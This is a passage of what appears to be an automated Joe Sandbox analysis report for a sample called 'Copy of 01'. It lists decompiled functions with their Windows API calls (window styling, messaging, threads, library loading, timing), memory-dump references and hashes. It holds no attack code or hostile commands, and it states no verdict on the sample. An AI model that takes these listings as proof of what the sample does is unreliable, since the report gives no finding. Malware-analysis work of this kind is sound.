                        • HeapFree.KERNEL32(00000000), ref: 0039161E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                        • Instruction ID: 95ddcf0473b55c4ba3f7889cc4eecd279eda924eade2f774c3161efb01ef2b4f
                        • Opcode Fuzzy Hash: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                        • Instruction Fuzzy Hash: 02217832E4010AAFDF12DFA4C945BEEB7B8EF45344F0A4459E845BB241E730AA05CBA0
                        Function 003C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 003C280A
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2824
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2832
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003C2840
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                        • Instruction ID: 0796af52e4974af942ec8f2df06a6833478c89560e4e4d0448032d4a9a411893
                        • Opcode Fuzzy Hash: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                        • Instruction Fuzzy Hash: F121A135204611AFD7169B24C895FAB7B99AF46324F15815CF42ACB6E2CB71FC42CB90
                        Function 003978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00398D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398D8C
                          • Part of subcall function 00398D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00398DB2
                          • Part of subcall function 00398D7D: lstrcmpiW.KERNEL32(00000000,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398DE3
                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397923
                        • lstrcpyW.KERNEL32(00000000,?), ref: 00397949
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397984
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: bde52a67e4e4dda7a7e3e6e0fddeb1c5b6db6005047bd43a46ff930a5f4ce567
                        • Instruction ID: 16b698e8333b539ea5ab66d2ec50087ade0f5d4b5570780393464c2f931032da
                        • Opcode Fuzzy Hash: bde52a67e4e4dda7a7e3e6e0fddeb1c5b6db6005047bd43a46ff930a5f4ce567
                        • Instruction Fuzzy Hash: 3611D67A210242AFDF165F39D845E7A77A9FF85350B50402AF946CB2A4EF319811C751
                        Function 003C7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7D0B
                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 003C7D2A
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003C7D42
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003AB7AD,00000000), ref: 003C7D6B
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID:
                        • API String ID: 847901565-0
                        • Opcode ID: 8b70404518c3d00a06e5258fb13c38e6cf081e847ebc56d57033b95b79cd4e0e
                        • Instruction ID: e8a62d088452d63de6ef32efa18bedc9b27ef7733e17016f7cfb587f13716fa2
                        • Opcode Fuzzy Hash: 8b70404518c3d00a06e5258fb13c38e6cf081e847ebc56d57033b95b79cd4e0e
                        • Instruction Fuzzy Hash: 1E114D72515615AFCB129F28DC08EA63BA9AF45360F168728FC3ADB2F0D7309D51DB50
                        Function 003C5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 003C56BB
                        • _wcslen.LIBCMT ref: 003C56CD
                        • _wcslen.LIBCMT ref: 003C56D8
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID:
                        • API String ID: 455545452-0
                        • Opcode ID: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                        • Instruction ID: 22287c36b5ac00fff2bdcd830440f22e9b75c4402d7990ab78637c68218876bb
                        • Opcode Fuzzy Hash: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                        • Instruction Fuzzy Hash: FF11E13160060896DB229F61CC85FEE77ACAF10364F10406EF905D6081E770EEC4CB60
                        Function 00391A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00391A47
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A59
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A6F
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                        • Instruction ID: b90c88207dc31e11f5da24d8cb07e489e1f301bd39096a200b6d630b10bad62f
                        • Opcode Fuzzy Hash: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                        • Instruction Fuzzy Hash: 9511F73AD01219FFEF119BA5C985FADFB78EB08750F210091EA04B7290D671AE50DB94
                        Function 0039E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 0039E1FD
                        • MessageBoxW.USER32(?,?,?,?), ref: 0039E230
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039E246
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0039E24D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                        • Instruction ID: e305e04b62d5c1863d0e14dc17cfa75b1e98893502a2397268daf138d22a0d7b
                        • Opcode Fuzzy Hash: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                        • Instruction Fuzzy Hash: C3112B76D04258BFDB02EFA8DC05E9E7FACEB45310F144625F824E3691D670DD0487A0
                        Function 0035D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,?,0035CFF9,00000000,00000004,00000000), ref: 0035D218
                        • GetLastError.KERNEL32 ref: 0035D224
                        • __dosmaperr.LIBCMT ref: 0035D22B
                        • ResumeThread.KERNEL32(00000000), ref: 0035D249
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                        • String ID:
                        • API String ID: 173952441-0
                        • Opcode ID: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                        • Instruction ID: 3d98d1210983d9bbedcfbfe07f175b4b80c5c73e094e9e9eef0fc06e003adedb
                        • Opcode Fuzzy Hash: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                        • Instruction Fuzzy Hash: 0701D276815208BBCB235BA6DC09FAE7A6DDF81332F114619FD259A1F0DB708909C7A0
                        Function 0033600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                        • GetStockObject.GDI32(00000011), ref: 00336060
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        • Opcode ID: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                        • Instruction ID: 5fe8a6a40ba88ca14cd9fbb9980663d0ce1b1f74985f7765a2e189c446f76f55
                        • Opcode Fuzzy Hash: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                        • Instruction Fuzzy Hash: FD116D72505508BFEF174FA49C86EEABB6DEF093A4F055215FA1992120D732EC60DBA0
                        Function 00353B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00353B56
                          • Part of subcall function 00353AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00353AD2
                          • Part of subcall function 00353AA3: ___AdjustPointer.LIBCMT ref: 00353AED
                        • _UnwindNestedFrames.LIBCMT ref: 00353B6B
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00353B7C
                        • CallCatchBlock.LIBVCRUNTIME ref: 00353BA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction ID: 328b1b9ceca077ebae6c275da7bf5cf183d039f03c87f4b4e1d023ef9d03f0be
                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction Fuzzy Hash: 43012932100148BBDF125E95CC42EEB3B69EF48799F054014FE489A121D732E965DBA0
                        Function 00363073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003313C6,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue), ref: 003630A5
                        • GetLastError.KERNEL32(?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000,00000364,?,00362E46), ref: 003630B1
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000), ref: 003630BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                        • Instruction ID: 14b6001cfe5ccbd64f426a1cad2271099d006b326be3a7b1b6db24be0579c591
                        • Opcode Fuzzy Hash: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                        • Instruction Fuzzy Hash: 2601D432312222ABCB334A79AC44E677B9CEF05BA1F158620F90BE3144C721D909C7E0
                        Function 00397464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0039747F
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00397497
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003974AC
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003974CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                        • Instruction ID: 31dcb48a65d0d69c7d69db084c395a858fb500c3c8272f4919f707f022109f0e
                        • Opcode Fuzzy Hash: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                        • Instruction Fuzzy Hash: 9011A1B12253119BEB228F16DC08FA27BFCEF00B00F108569E61AD6592D770F904DB90
                        Function 0039B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0C4
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0E9
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0F3
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B126
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                        • Instruction ID: 5aa50fccbcf7564c65267e614600d0050d59634a18402beb44df3b7498229d0a
                        • Opcode Fuzzy Hash: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                        • Instruction Fuzzy Hash: 8E115B31C0162DE7CF02AFE5EA69AEEFB78FF49711F114095D981B2281CB3056508B91
                        Function 00392DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                        • GetCurrentThreadId.KERNEL32 ref: 00392DDD
                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                        • Instruction ID: 6e8126733ea5ce9b9ad53f958f15ac74ecd2fa22d482779ac12e2a905dc37453
                        • Opcode Fuzzy Hash: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                        • Instruction Fuzzy Hash: E5E09272511624BBDB221B739C0DFEB3E6CFF42BA1F051015F10AD10809AA4D841C7B0
                        Function 003C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003C8887
                        • LineTo.GDI32(?,?,?), ref: 003C8894
                        • EndPath.GDI32(?), ref: 003C88A4
                        • StrokePath.GDI32(?), ref: 003C88B2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                        • Instruction ID: c4635529b6e2cdfe5eab2eb93f124e35ee15b94bbdbf3a06372a1541eb54aacc
                        • Opcode Fuzzy Hash: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                        • Instruction Fuzzy Hash: CDF05E36041268FADB135F94AC09FDE3F59AF06310F048004FA55A50E1CB756A11CFE9
                        Function 003498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 003498CC
                        • SetTextColor.GDI32(?,?), ref: 003498D6
                        • SetBkMode.GDI32(?,00000001), ref: 003498E9
                        • GetStockObject.GDI32(00000005), ref: 003498F1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$ModeObjectStockText
                        • String ID:
                        • API String ID: 4037423528-0
                        • Opcode ID: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                        • Instruction ID: 1602d3f96f555994c33ed479ab6d63a595f11100d71a4992173ab72c8c19eded
                        • Opcode Fuzzy Hash: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                        • Instruction Fuzzy Hash: 46E06531654240AEDB225B75BC09FE93F55AB12335F188219F6FDD80E1C372A6419B10
                        Function 0039162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00391634
